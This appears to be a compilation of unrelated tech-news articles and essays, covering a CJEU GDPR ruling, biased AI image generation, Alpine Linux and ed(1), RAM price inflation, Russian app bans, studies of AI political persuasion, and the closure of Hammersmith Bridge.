Basically, all three of those are effectively impossible.
Think about what the court is actually demanding here. Pre-checking posts means full-scale automated surveillance of every piece of content before it goes live—not just scanning for known CSAM hashes or obvious spam, but making subjective legal determinations about what constitutes “sensitive personal data” under the GDPR. Requiring user identification kills anonymity entirely, which is its own massive speech issue. And somehow preventing third parties from copying content? That’s not even a technical problem—it’s a “how do you stop the internet from working like the internet” problem.
Some people have said that this ruling isn’t so bad, because the ruling is about advertisements and because it’s talking about “sensitive personal data.” But it’s difficult to see how either of those things limit this ruling at all.
There’s nothing inherently in the law or the ruling that limits its conclusions to “advertisements.” The same underlying factors would apply to any third party content on any website that is subject to the GDPR.
As for the “sensitive personal data” part, that makes little difference because sites will have to scan all content before anything is posted to guarantee no “sensitive personal data” is included and then accurately determine what a court might later deem to be such sensitive personal data. That means it’s highly likely that any website that tries to comply under this ruling will block a ton of content on the off chance that maybe that content will be deemed sensitive.
As the court noted:
In accordance with Article 5(1)(a) of the GDPR, personal data are to be processed lawfully, fairly and in a transparent manner in relation to the data subject. Article 5(1)(d) of the GDPR adds that personal data processed must be accurate and, where necessary, kept up to date. Thus, every reasonable step must be taken to ensure that personal data that are inaccurate, having regard to the purposes for which they are processed, are erased or rectified without delay. Article 5(1)(f) of that regulation provides that personal data must be processed in a manner that ensures appropriate security of those data, including protection against unauthorised or unlawful processing.
Good luck figuring out how to do that with third-party content.
And they’re pretty clear that every website must pre-scan every bit of content. They claim it’s about “marketplaces” and “advertisements” but there’s nothing in the GDPR that limits this ruling to those categories:
Accordingly, inasmuch as the operator of an online marketplace, such as the marketplace at issue in the main proceedings, knows or ought to know that, generally, advertisements containing sensitive data in terms of Article 9(1) of the GDPR, are liable to be published by user advertisers on its online marketplace, that operator, as controller in respect of that processing, is obliged, as soon as its service is designed, to implement appropriate technical and organisational measures in order to identify such advertisements before their publication and thus to be in a position to verify whether the sensitive data that they contain are published in compliance with the principles set out in Chapter II of that regulation. Indeed, as is apparent in particular from Article 25(1) of that regulation, the obligation to implement such measures is incumbent on it not only at the time of the processing, but already at the time of the determination of the means of processing and, therefore, even before sensitive data are published on its online marketplace in breach of those principles, that obligation being specifically intended to prevent such breaches.
No more anonymity allowed:
As regards, in the second place, the question whether the operator of an online marketplace, as controller of the sensitive data contained in advertisements published on its website, jointly with the user advertiser, must verify the identity of that user advertiser before the publication, it should be recalled that it follows from a combined reading of Article 9(1) and Article 9(2)(a) of the GDPR that the publication of such data is prohibited, unless the data subject has given his or her explicit consent to the data in question being published on that online marketplace or one of the other exceptions laid down in Article 9(2)(b) to (j) is satisfied, which does not, however, appear to be the case here.
On that basis, while the placing by a data subject of an advertisement containing his or her sensitive data on an online marketplace may constitute explicit consent, within the meaning of Article 9(2)(a) of the GDPR, such consent is lacking where that advertisement is placed by a third party, unless that party can demonstrate that the data subject has given his or her explicit consent to the publication of that advertisement on the online marketplace in question. Consequently, in order to be able to ensure, and to be able to demonstrate, that the requirements laid down in Article 9(2)(a) of the GDPR are complied with, the operator of the marketplace is required to verify, prior to the publication of such an advertisement, whether the user advertiser preparing to place the advertisement is the person whose sensitive data appear in that advertisement, which presupposes that the identity of that user advertiser is collected.
Finally, as Keller noted above, the CJEU seems to think it’s possible to require platforms to make sure content is never displayed on any other platform as well:
Thus, where sensitive data are published online, the controller is required, under Article 32 of the GDPR, to take all technical and organisational measures to ensure a level of security apt to effectively prevent the occurrence of a loss of control over those data.
To that end, the data controller must consider in particular all technical measures available in the current state of technical knowledge that are apt to block the copying and reproduction of online content .
Again, the CJEU appears to be living in a fantasy land that doesn’t exist.
This is what happens when you over-index on the idea of “data controllers” needing to keep data “private.” Whoever revealed sensitive data should have the liability placed on them. Putting it on the intermediary is misplaced and ridiculous.
There is simply no way to comply with the law under this ruling.
In such a world, the only options are to ignore it, shut down EU operations, or geoblock the EU entirely. I assume most platforms will simply ignore it—and hope that enforcement will be selective enough that they won’t face the full force of this ruling. But that’s a hell of a way to run the internet, where companies just cross their fingers and hope they don’t get picked for an enforcement action that could destroy them.
There’s a reason why the basic simplicity of Section 230 makes sense. It says “the person who creates the content that violates the law is responsible for it.” As soon as you open things up to say the companies that provide the tools for those who create the content can be liable, you’re opening up a can of worms that will create a huge mess in the long run.
That long run has arrived in the EU, and with it, quite the mess.
Filed Under:
cjeu
,
controller
,
data protection
,
dsa
,
gdpr
,
intermediary liability
,
section 230
,
sensitive data
,
user generated content
Companies:
russmedia
Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – and sometimes appends the logos of large charities.
Asking the tool tens of times to generate an image for the prompt “volunteer helps children in Africa” yielded, with two exceptions, a picture of a white woman surrounded by Black children, often with grass-roofed huts in the background.
In several of these images, the woman wore a T-shirt emblazoned with the phrase “Worldwide Vision”, and with the UK charity World Vision’s logo. In another, a woman wearing a Peace Corps T-shirt squatted on the ground, reading The Lion King to a group of children.
The prompt “heroic volunteer saves African children” yielded multiple images of a man wearing a vest with the logo of the Red Cross.
Arsenii Alenichev, a researcher at the Institute of Tropical Medicine in Antwerp studying the production of global health images, said he noticed these images, and the logos, when experimenting with Nano Banana Pro earlier this month.
“The first thing that I noticed was the old suspects: the white saviour bias, the linkage of dark skin tone with poverty and everything. Then something that really struck me was the logos, because I did not prompt for logos in those images and they appear.”
Examples he shared with the Guardian showed women wearing “Save the Children” and “Doctors Without Borders” T-shirts, surrounded by Black children, with tin-roofed huts in the background. These were also generated in response to the prompt “volunteer helps children in Africa”.
In response to a query from the Guardian, a World Vision spokesperson said: “We haven’t been contacted by Google or Nano Banana Pro, nor have we given permission to use or manipulate our own logo or misrepresent our work in this way.”
Kate Hewitt, the director of brand and creative at Save the Children UK, said: “These AI-generated images do not represent how we work.”
She added: “We have serious concerns about third parties using Save the Children’s intellectual property for AI content generation, which we do not consider legitimate or lawful. We’re looking into this further along with what action we can take to address it.”
AI image generators have been shown repeatedly to replicate – and at times exaggerate – US social biases. Models such as Stable Diffusion and OpenAI’s Dall-E offer mostly images of white men when asked to depict “lawyers” or “CEOs”, and mostly images of men of colour when asked to depict “a man sitting in a prison cell”.
Recently, AI-generated images of extreme, racialised poverty have flooded stock photo sites, leading to discussion in the NGO community about how AI tools replicate harmful images and stereotypes, bringing in an era of “poverty porn 2.0”.
It is unclear why Nano Banana Pro adds the logos of real charities to images of volunteers and scenes depicting humanitarian aid.
In response to a query from the Guardian, a Google spokesperson said: “At times, some prompts can challenge the tools’ guardrails and we remain committed to continually enhancing and refining the safeguards we have in place.”
The best public interest journalism relies on first-hand accounts from people in the know.
If you have something to share on this subject, you can contact us confidentially using the following methods.
Secure Messaging in the Guardian app
The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.
If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.
SecureDrop, instant messengers, email, telephone and post
If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .
Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.
Illustration: Guardian Design / Rich Cousins
Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk), and replacing the linux-edge package with linux-stable :
For years, linux-lts and linux-edge grew apart and developed their own kernel configs, different architectures, etc.
Now linux-edge gets replaced with linux-stable which has the identical configuration as linux-lts, but follows the stable releases instead of the long-term releases (see https://kernel.org/).
The /usr merge planned for this release has been postponed ; a new timeline for the change will be published later. See the release notes for more information on this release.
The page you have tried to view ( The beginning of the 6.19 merge window ) is currently available to LWN subscribers only.
Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in with the form below to read this content.
Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.
(Alternatively, this item will become freely available on December 18, 2025)
As the weirdo behind the somewhat tongue-in-cheek
@ed1conf
account on
Twitter
and
Mastodon
,
account I'm occasionally asked "Why
ed(1)
?"
Hopefully some of my reasons for learning & using
ed(1)
can pique your interest in taking the time to get to know
this little piece of history.
Sometimes your favorite
$EDITOR
is installed, sometimes it's not. Some, like
vi
/
vim
are just about everywhere. Other times, you would have to
have sufficient privileges/space to install or compile your
editor of choice. But if you know
ed
,
nearly every Linux/BSD/Mac has it installed because
it's part of the POSIX standard
. It's even small
enough to fit on most recovery media without breaking the
bank. But between
ed
and
vi/vim
,
I know that I can get things done even when I'm on a new
machine.
Several times in my life
ed
has been the only editor available in certain environments.
$DAYJOB[-1]
the Linux-based router needed some configuration changes
that the web interface didn't accommodate. So a quick
terminal connection later
(
telnet
,
sigh
), I discovered that
ed
was the only editor available. No problem. Edited the
config file and we were back up and running with the proper
changes.
$DAYJOB[-1]
,
I developed software for a
ruggedized hand-held device and its attached printer
.
This was back when
PDA
s
were just becoming popular, so this thing was a brick.
The DOS-based operating system had no built-in editor,
meaning editing files usually meant laboriously copying the
file over a serial link to the PC, editing it there, then
sending it back down. I longed for the ability to cut that
time down but very few of the full-screen editors I tried
were even able to successfully paint on the small LCD
screen-buffer properly, and of those that did, the on-screen
keyboard took up so much screen real-estate as to make them
useless. So I installed a DOS build of
ed
and it worked like a charm (better than
edlin.exe
that I also tried). Editing turn-around and testing went
from 15-20 minutes down to 3-5 minutes per iteration.
ed
as their editor
.
Not usually an issue since most of the time you're not
trying to edit live on the server. But if you need to do
it, it's nice to know how.
ed
-like editor.
Unless you have a key-echoing utility like Screenkey or Screenflick, it's hard for an audience to see exactly what you did when you're editing during a presentation. It's nice to for the audience to be able to see exactly what you typed if they're trying to follow along.
Sometimes your terminal emulator or keyboard isn't
configured correctly. Function keys, arrows,
alt-
and
meta-
modifiers
may not transmit properly. Since all of
ed
's commands are basic ASCII, it works even
if your keyboard/terminal is unable to send extended
characters properly.
$TERM
is messed up
Likewise, your
$TERM
setting can get messed up. Sometimes full-screen terminal
applications leave the screen in a state where everything is
somewhat garbled. Yes, there's
reset
which will let you reset the terminal back to some sensible
defaults, but sometimes your
termcap
database has trouble too. An editor that only uses
stdin
and
stdout
can save your bacon.
Because
ed
reads all of its commands from
stdin
and writes all output to
stdout
in a serial fashion, it's very usable in a screen-reader
like
yasr
or
speakup
allowing you to edit text without a screen. If you've never
edited text sightless, give it a try some time.
Because
ed
reads all of its commands from
stdin
it's easy to write a script that will edit a file in an
automated fashion.
On occasion, I want to see the output of one or more
previous shell commands while I continue to edit. A
full-screen editor takes over the entire screen, preventing
me from seeing that output. With
ed
the previous output is right there and remains in my
scroll-back buffer for reference while I edit.
I find this particularly useful when using
\e
in
psql
or
mysql
if my
$EDITOR
is set to
ed
.
This allows me to edit the SQL while keeping the results of
my previous query visible.
On resource-constrained systems, sometimes you need
something light like
ed
where the executable and memory-footprint are measured in
kilobytes rather than megabytes. This is less of a problem
on most systems these days, but with small
resource-constrained
SOC
and embedded boards running Linux or BSD, a light-weight
yet powerful editor can help.
Sometimes you are connected by a slow or very laggy connection. Whether this is a satellite uplink, a 300-baud serial connection, or a congested WAN link, sometimes you simply want to edit productively without the overhead of repainting the screen.
Finally, there's a small measure of grey-beard prestige that comes with using an editor that baffles so many people . It's a fast way to demonstrate that I'm not some newbie with cert-only knowledge, but that I enjoy Unix history and working at the command-line. Or maybe it shows that I'm just a little crazy.
Memory price inflation comes for us all, and if you're not affected yet, just wait.
I was building a new PC last month using some parts I had bought earlier this year. The 64 Gigabyte T-Create DDR5 memory kit I used cost $209 then. Today? The same kit costs $650 !
Just in the past week, we found out Raspberry Pi's increasing their single board computer prices . Micron's killing the Crucial brand of RAM and storage devices completely , meaning there's gonna be one fewer consumer memory manufacturer. Samsung can't even buy RAM from themselves to build their own Smartphones, and small vendors like Libre Computer and Mono are seeing RAM prices double, triple, or even worse , and they're not even buying the latest RAM tech!
I think PC builders might be the first crowd to get impacted across the board—just look at these insane graphs from PC Parts Picker , showing RAM prices going from like $30 to $120 for DDR4, or like $150 to five hundred dollars for 64 gigs of DDR5.
But the impacts are only just starting to hit other markets.
Libre Computer mentioned on Twitter a single 4 gigabyte module of LPDDR4 memory costs $35. That's more expensive than every other component on one of their single board computers combined ! You can't survive selling products at a loss, so once the current production batches are sold through, either prices will be increased, or certain product lines will go out of stock.
The smaller the company, the worse the price hit will be. Even Raspberry Pi, who I'm sure has a little more margin built in, already raised SBC prices (and introduced a 1 GB Pi 5—maybe a good excuse for developers to drop Javascript frameworks and program for lower memory requirements again?).
Cameras, gaming consoles, tablets, almost anything that has memory will get hit sooner or later.
I can't believe I'm saying this, but compared to the current market, Apple's insane memory upgrade pricing is... actually in line with the rest of the industry.
The reason for all this, of course, is AI datacenter buildouts. I have no clue if there's any price fixing going on like there was a few decades ago —that's something conspiracy theorists can debate—but the problem is there's only a few companies producing all the world's memory supplies.
And those companies all realized they can make billions more dollars making RAM just for AI datacenter products, and neglect the rest of the market.
So they're shutting down their consumer memory lines, and devoting all production to AI.
Even companies like GPU board manufacturers are getting shafted; Nvidia's not giving memory to them along with their chips like they used to , basically telling them "good luck, you're on your own for VRAM now!"
Which is especially rich, because Nvidia's profiting obscenely off of all this stuff .
That's all bad enough, but some people see a silver lining. I've seen some people say "well, once the AI bubble bursts, at least we'll have a ton of cheap hardware flooding the market!"
And yes, in past decades, that might be one outcome.
But the problem here is the RAM they're making, a ton of it is either integrated into specialized GPUs that won't run on normal computers, or being fitted into special types of memory modules that don't work on consumer PCs, either. (See: HBM ).
That, and the GPUs and servers being deployed now don't even run on normal power and cooling, they're part of massive systems that would take a ton of effort to get running in even the most well-equipped homelabs. It's not like the classic Dell R720 that just needs some air and a wall outlet to run.
That is to say, we might be hitting a weird era where the PC building hobby is gutted, SBCs get prohibitively expensive, and anyone who didn't stockpile parts earlier this year is, pretty much, in a lurch.
Even Lenovo admits to stockpiling RAM , making this like the toilet paper situation back in 2020, except for massive corporations. Not enough supply, so companies who can afford to get some will buy it all up, hoping to stave off the shortages that will probably last longer, partly because of that stockpiling.
I don't think it's completely outlandish to think some companies will start scavenging memory chips (ala dosdude1 ) off other systems for stock, especially if RAM prices keep going up.
It's either that, or just stop making products. There are some echoes to the global chip shortages that hit in 2021-2022, and that really shook up the market for smaller companies.
I hate to see it happening again, but somehow, here we are a few years later, except this time, the AI bubble is to blame.
Sorry for not having a positive note to end this on, but I guess... maybe it's a good time to dig into that pile of old projects you never finished instead of buying something new this year.
How long will this last? That's anybody's guess. But I've already put off some projects I was gonna do for 2026, and I'm sure I'm not the only one.
Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks.
Roskomnadzor said that the two platforms are also being used to recruit criminals and to commit fraud and various other crimes targeting Russian citizens.
"According to law enforcement agencies, the FaceTime service is used to organize and carry out terrorist attacks in the country, recruit their perpetrators, commit fraudulent and other crimes against our citizens," it said in a Thursday statement.
While it didn't announce it until today, the Russian telecom regulator said that Snapchat had been blocked on October 10, "in accordance with the rules of centralized management of the public communication network."
As of this month, Snapchat for Android has been downloaded over 1 billion times on the Google Play Store, while the iOS version has over 5.2 million ratings on Apple's App Store. FaceTime is Apple's proprietary videotelephony platform that comes preinstalled on the company's iOS and macOS devices.
Apple and Snap spokespersons were not immediately available for comment when contacted by BleepingComputer earlier today.
On Wednesday, Roskomnadzor also banned the Roblox online gaming platform for allegedly failing to stop the distribution of what the Russian watchdog described as LGBT propaganda and extremist materials.
Russian news agency Interfax also reported on Friday that Russia is planning to ban Meta's WhatsApp messaging platform , which is now being used by over 3 billion people worldwide.
One year ago, Roskomnadzor blocked the Viber encrypted messaging app , used by hundreds of millions, for violating the country's anti-extremism and anti-terrorism legislation, months after blocking access to the Signal encrypted messaging service for the same reason.
In March 2023, it also banned government and state agencies from using foreign private messaging platforms, including Discord, Microsoft Teams, Telegram, Threema, Viber, WhatsApp, and WeChat, claiming that the service had failed to remove "misinformation" from their platforms.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
🌘
Subscribe to 404 Media to get The Abstract , our newsletter about the most exciting and mind-boggling science news and studies of the week.
Scientists are raising alarms about the potential influence of artificial intelligence on elections, according to a spate of new studies that warn AI can rig polls and manipulate public opinion .
In a study published in Nature on Thursday, scientists report that AI chatbots can meaningfully sway people toward a particular candidate—providing better results than video or television ads. Moreover, chatbots optimized for political persuasion “may increasingly deploy misleading or false information,” according to a separate study published on Thursday in Science.
“The general public has lots of concern around AI and election interference, but among political scientists there’s a sense that it’s really hard to change peoples’ opinions, ” said David Rand, a professor of information science, marketing, and psychology at Cornell University and an author of both studies. “We wanted to see how much of a risk it really is.”
In the Nature study, Rand and his colleagues enlisted 2,306 U.S. citizens to converse with an AI chatbot in late August and early September 2024. The AI model was tasked with both increasing support for an assigned candidate (Harris or Trump) and with increasing the odds that the participant who initially favoured the model’s candidate would vote, or decreasing the odds they would vote if the participant initially favored the opposing candidate—in other words, voter suppression.
In the U.S. experiment, the pro-Harris AI model moved likely Trump voters 3.9 points toward Harris, which is a shift that is four times larger than the impact of traditional video ads used in the 2016 and 2020 elections. Meanwhile, the pro-Trump AI model nudged likely Harris voters 1.51 points toward Trump.
The researchers ran similar experiments involving 1,530 Canadians and 2,118 Poles during the lead-up to their national elections in 2025. In the Canadian experiment, AIs advocated either for Liberal Party leader Mark Carney or Conservative Party leader Pierre Poilievre. Meanwhile, the Polish AI bots advocated for either Rafał Trzaskowski, the centrist-liberal Civic Coalition’s candidate, or Karol Nawrocki, the right-wing Law and Justice party’s candidate.
The Canadian and Polish bots were even more persuasive than in the U.S. experiment: The bots shifted candidate preferences up to 10 percentage points in many cases, three times farther than the American participants. It’s hard to pinpoint exactly why the models were so much more persuasive to Canadians and Poles, but one significant factor could be the intense media coverage and extended campaign duration in the United States relative to the other nations.
“In the U.S., the candidates are very well-known,” Rand said. “They've both been around for a long time. The U.S. media environment also really saturates with people with information about the candidates in the campaign, whereas things are quite different in Canada, where the campaign doesn't even start until shortly before the election.”
“One of the key findings across both papers is that it seems like the primary way the models are changing people's minds is by making factual claims and arguments,” he added. “The more arguments and evidence that you've heard beforehand, the less responsive you're going to be to the new evidence.”
While the models were most persuasive when they provided fact-based arguments, they didn’t always present factual information. Across all three nations, the bot advocating for the right-leaning candidates made more inaccurate claims than those boosting the left-leaning candidates. Right-leaning laypeople and party elites tend to share more inaccurate information online than their peers on the left, so this asymmetry likely reflects the internet-sourced training data.
“Given that the models are trained essentially on the internet, if there are many more inaccurate, right-leaning claims than left-leaning claims on the internet, then it makes sense that from the training data, the models would sop up that same kind of bias,” Rand said.
With the Science study, Rand and his colleagues aimed to drill down into the exact mechanisms that make AI bots persuasive. To that end, the team tasked 19 large language models (LLMs) to sway nearly 77,000 U.K. participants on 707 political issues.
The results showed that the most effective persuasion tactic was to provide arguments packed with as many facts as possible, corroborating the findings of the Nature study. However, there was a serious tradeoff to this approach, as models tended to start hallucinating and making up facts the more they were pressed for information.
“It is not the case that misleading information is more persuasive,” Rand said. ”I think that what's happening is that as you push the model to provide more and more facts, it starts with accurate facts, and then eventually it runs out of accurate facts. But you're still pushing it to make more factual claims, so then it starts grasping at straws and making up stuff that's not accurate.”
In addition to these two new studies, research published in Proceedings of the National Academy of Sciences last month found that AI bots can now corrupt public opinion data by responding to surveys at scale. Sean Westwood, associate professor of government at Dartmouth College and director of the Polarization Research Lab , created an AI agent that exhibited a 99.8 percent pass rate on 6,000 attempts to detect automated responses to survey data.
“Critically, the agent can be instructed to maliciously alter polling outcomes, demonstrating an overt vector for information warfare,” Westwood warned in the study. “These findings reveal a critical vulnerability in our data infrastructure, rendering most current detection methods obsolete and posing a potential existential threat to unsupervised online research.”
Taken together, these findings suggest that AI could influence future elections in a number of ways, from manipulating survey data to persuading voters to switch their candidate preference—possibly with misleading or false information.
To counter the impact of AI on elections, Rand suggested that campaign finance laws should provide more transparency about the use of AI, including canvasser bots, while also emphasizing the role of raising public awareness.
“One of the key take-homes is that when you are engaging with a model, you need to be cognizant of the motives of the person that prompted the model, that created the model, and how that bleeds into what the model is doing,” he said.
🌘
Subscribe to 404 Media to get The Abstract , our newsletter about the most exciting and mind-boggling science news and studies of the week.
Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the UK government’s AI security body.
Researchers said the study was the largest and most systematic investigation of AI persuasiveness to date, involving nearly 80,000 British participants holding conversations with 19 different AI models.
The AI Security Institute carried out the study amid fears that chatbots can be deployed for illegal activities including fraud and grooming.
The topics included “public sector pay and strikes” and “cost of living crisis and inflation”, with participants interacting with a model – the underlying technology behind AI tools such as chatbots – that had been prompted to persuade the users to take a certain stance on an issue.
Advanced models behind ChatGPT and Elon Musk’s Grok were among those used in the study, which was also authored by academics at the London School of Economics, Massachusetts Institute of Technology, the University of Oxford and Stanford University.
Before and after the chat, users reported whether they agreed with a series of statements expressing a particular political opinion.
The study , published in the journal Science on Thursday, found that “information-dense” AI responses were the most persuasive. Instructing the model to focus on using facts and evidence yielded the largest persuasion gains, the study said. However, the models that used the most facts and evidence tended to be less accurate than others.
“These results suggest that optimising persuasiveness may come at some cost to truthfulness, a dynamic that could have malign consequences for public discourse and the information ecosystem,” said the study.
On average, the AI and human participant would exchange about seven messages each in an exchange lasting 10 minutes.
It added that tweaking a model after its initial phase of development, in a practice known as post-training, was an important factor in making it more persuasive. The study made the models, which included freely available “open source” models such as Meta’s Llama 3 and Qwen by the Chinese company Alibaba, more convincing by combining them with “reward models” that recommended the most persuasive outputs.
Researchers added that an AI system’s ability to churn out information could make it more manipulative than the most compelling human.
“Insofar as information density is a key driver of persuasive success, this implies that AI could exceed the persuasiveness of even elite human persuaders, given their unique ability to generate large quantities of information almost instantaneously during conversation,” said the report.
Feeding models personal information about the users they were interacting with did not have as big an impact as post-training or increasing information density, said the study.
Kobi Hackenburg, an AISI research scientist and one of the report’s authors, said: “What we find is that prompting the models to just use more information was more effective than all of these psychologically more sophisticated persuasion techniques.”
However, the study added that there were some obvious barriers to AIs manipulating people’s opinions, such as the amount of time a user may have to engage in a long conversation with a chatbot about politics. There are also theories suggesting there are hard psychological limits to human persuadability, researchers said.
Hackenburg said it was important to consider whether a chatbot could have the same persuasive impact in the real world where there were “lots of competing demands for people’s attention and people aren’t maybe as incentivised to sit and engage in a 10-minute conversation with a chatbot or an AI system”.
I had the pleasure of going to the Netherlands in 2023.
Amsterdam and Rotterdam are cool, but Utrecht has something really special, The Speelkok (Self playing instrument) Museum .
There’s so much cool stuff in there, automata, the only self playing violin, clocks, draaiorgels (street organs), but the coolest is this.
That is a 1930s dance hall machine. It takes in a cardboard book with hole punches. The music is encoded as punches, each hole means to play that note from the music staff. It replaced music barrels, metal barrals with nubs that hit forks from music boxes, since they could dynamically program the song.
But somehow someone hooked up a laptop to it! So now it can play mp3s from a laptop instead of the book. What ?!
How, why and who are a total mystery to me, but I’d like to find out more.
I’ve sent the museum an email and hope to hear back for more info. It’ll take about 14 business days. If you know anything about this please reach out.
Maybe the internet can help me figure this out?
- Chris
Paris, 15th April 2019, 6:43pm.
Inside the ancient cathedral all is quiet. Afternoon light filters through the stained glass.
A fire alarm pierces the silence.
Within minutes, flames tear through the oak roof. Eight centuries of timber explode into an inferno visible across the city. Parisians gather on the Seine’s banks as the spire collapses through the nave in a cascade of embers.
Hours later, the French President stands before the ruin: “Cette cathédrale, nous la rebâtirons.”
This cathedral, we will rebuild it.
On 8th December 2024, five years and seven months after the fire, Notre-Dame reopens, its spire restored, the rose windows gleaming once again.
London, 10th April 2019, 3:47pm.
Five days earlier, it’s a bright spring afternoon in west London.
On Hammersmith Bridge, traffic inches forward, suffocated by congestion. Above, the suspension chains creak under the weight of queuing cars. Cyclists weave between wing mirrors. Beneath the footpaths, invisible cracks spread deeper into the 132-year-old pedestals.
Engineers monitoring the structure see the warning signs of imminent collapse. The decision is taken: close the bridge to motor traffic immediately.
Barriers go up. The traffic melts away.
Six years later, Hammersmith Bridge remains closed to vehicles. The solution proposed by local authorities costs £250m and has no funding.
One might reasonably object that comparing Notre-Dame to Hammersmith Bridge is unfair. A Gothic cathedral and a Victorian suspension bridge are worlds apart.
Fair enough. Instead, consider this comparison: Hammersmith Bridge itself.
In 1882 , a boat struck Hammersmith Bridge causing damage that revealed five decades of deterioration. Parliament authorised a replacement in 1883 and provided for a temporary crossing. Four years later, the Prince of Wales opened a new bridge designed by Bazalgette (of London sewer fame ). Cost: £83,000 (£9.5m today). 1
In 2019 , ultrasound revealed dangerous micro-fractures in Hammersmith Bridge’s structure. The bridge was immediately closed with no temporary alternative provided. Six years later, the bridge is still closed to traffic (but stabilised). Cost to date: £48m, with full restoration estimated at £250m. Long-term solution: none.
Our Victorian forebears rebuilt their broken bridge faster than we’ve failed to find a solution for ours.
Hammersmith Bridge isn’t just a local transport problem, it’s symptomatic of Britain’s broader state crisis.
This is happening in central London. Not in a rural “backwater”, not in a “left behind” urban centre, but in one of the wealthiest communities in Britain, on a major transport artery. If Britain cannot fix Hammersmith Bridge, what is failing in places that nobody is watching?
This essay examines two questions.
First: how did Britain reach a point where we cannot fix a bridge?
Second: given that reality, what should we actually do about Hammersmith Bridge?
The first answer reveals a state crisis: every actor can block decisions; none can compel action.
The second is more surprising.
When the bridge closed, about 25,000 vehicles crossed it daily and TfL predicted a severe economic impact.
Six years later, 9,000 of those journeys have vanished - not diverted to other crossings, but simply evaporated. Yet the local economy has adapted, air quality has improved, and overall traffic congestion has lessened.
This counterintuitive outcome begs the question: are we actually solving the right problem?
The “obvious” £250m solution may be addressing the wrong issue. The best solution may cost far less, involve no cars, and turn paralysis into opportunity.
Hammersmith Bridge is a testament to Victorian engineering prowess. The present-day bridge is Bazalgette’s 1887 design: a wrought-iron suspension structure with ornate decorative features and coated in deep green paint that blends into the willow-lined bank.
It replaced an earlier bridge constructed in 1827 by local engineer William Tierney Clark . That first bridge cost £80,000 (approximately £8.9m today), was funded by private investors, and operated as a private toll bridge by the Hammersmith Bridge Company. 2 Unusually amongst London toll bridges, it turned a profit. In 1880, it was purchased by the Metropolitan Board of Works and made toll-free . 3
Clark’s designs at Hammersmith and Marlow so impressed a visiting Hungarian aristocrat that he was later commissioned to build a sister bridge in Budapest, the Széchenyi Chain Bridge over the Danube, which remains a national symbol today. 4
Fifty years later, in 1882, the aforementioned boat collision and concerns about weight capacity on Boat Race days led Parliament to authorise a replacement. 5 A temporary crossing structure was installed and just four years later, on 11th June 1887, Bazalgette’s bridge was opened at the cost of £83,000 (approximately £9.5m today). 6
For over 125 years, the bridge received minimal maintenance. 7 This is despite it being bombed three times: by the IRA in 1939, the Provisional IRA in 1996, and the Real IRA in 2000. 8 9
Only in 2014 was a comprehensive structural review first commissioned. 10
The findings were alarming: decades of unchecked corrosion had created micro-fractures throughout the suspension structure, and the Victorian bearings that allow the bridge to flex with temperature had seized solid.
In April 2019, engineers discovered that the micro-fractures had widened enough to close the bridge to vehicles, though pedestrians and cyclists could still cross. Then in August 2020’s heatwave, sensors detected rapid crack expansion. The council’s senior engineer allegedly gave the council leader just 30 seconds to make the critical decision. 11
Cast iron is unforgivingly brittle; it doesn’t bend, it shatters. With the potential for catastrophic collapse into the Thames, the bridge was completely closed, halting both pedestrian and river traffic beneath. 12
Did the review and precautionary measures save lives?
Consider Genoa’s Morandi Bridge , a 210-metre section collapsed in August 2018, killing 43 people. The operator had warned in 2011 that collapse within 10 years was possible, yet adequate action was never taken.
Compare too Dresden’s Carola Bridge , a 100-metre section collapsed in September 2024 just minutes after the last tram crossed. The cause was hidden stress corrosion cracking that had existed since construction in 1971.
In 2021 , stabilisation work was undertaken and the bridge’s side walkways were made accessible to pedestrians and cyclists. 13 Engineers innovatively filled the cast iron pedestals with fibre-reinforced concrete, installed steel support frames, replaced the Victorian bearings with modern rubber ones, and wrapped the chains in foil with air conditioning to keep them cool during heatwaves.
What can the stabilised bridge carry?
The local council initially claimed the stabilised restriction limited vehicles to 1 tonne (equivalent to a Fiat 500). After a third FOI request and internal review, the local council acknowledged the maximum allowable mass was 3 tonnes (a Volkswagen Transporter). 14 The bridge cannot support regular buses (12-18 tonnes) or normal traffic, but could theoretically support one lightweight vehicle. The stabilisation has secured the structure, but not restored its function.
In April 2025 , with stabilisation achieved, the main carriageway was reopened to cyclists and pedestrians, exactly six years after the initial closure, but remains closed to all vehicle traffic including buses and cars.
The stabilisation works to date have cost £48m, five times more than the original construction costs for the entire bridge - why is that?
The explanation lies in a fundamental shift in cost structure.
The 1887 bridge (£83,000, or £9.4m today) was dominated by material costs (perhaps 60%), with minimal professional fees and zero regulatory costs. 15
The 2019-25 stabilisation (£48m cost) inverts this cost structure: labour comprises perhaps 40%, professional fees have tripled to perhaps 18%, and regulatory compliance (a category that didn’t exist in Victorian times) consumes perhaps 12%. 16
No itemised accounts exist for either project, but these estimates are based on comparative studies of similar projects (methodology in footnotes).
There has been a profound increase in the cost of British infrastructure. This cost inflation reflects genuine progress, but of a specific kind.
The Victorians built with brutal efficiency: workers died on their projects (accepted as the cost of doing business), heritage protection was non-existent, and accountability was staked on just one engineer’s reputation.
We have replaced this with a system that is better, but also exponentially more expensive: zero-tolerance safety protocols, Grade II listing requirements, extensive insurance and oversight structures. Regulatory compliance (a category that didn’t exist in 1887) now consumes perhaps 12% of the budget.
The Victorians deployed one engineer and one contractor. The modern stabilisation required six major organisations plus multiple specialist consultancies, quangos and charities. Each improvement is defensible on its own merits. Taken together, however, they create paralysis: costs multiply, timelines extend, and every stakeholder gains effective veto power.
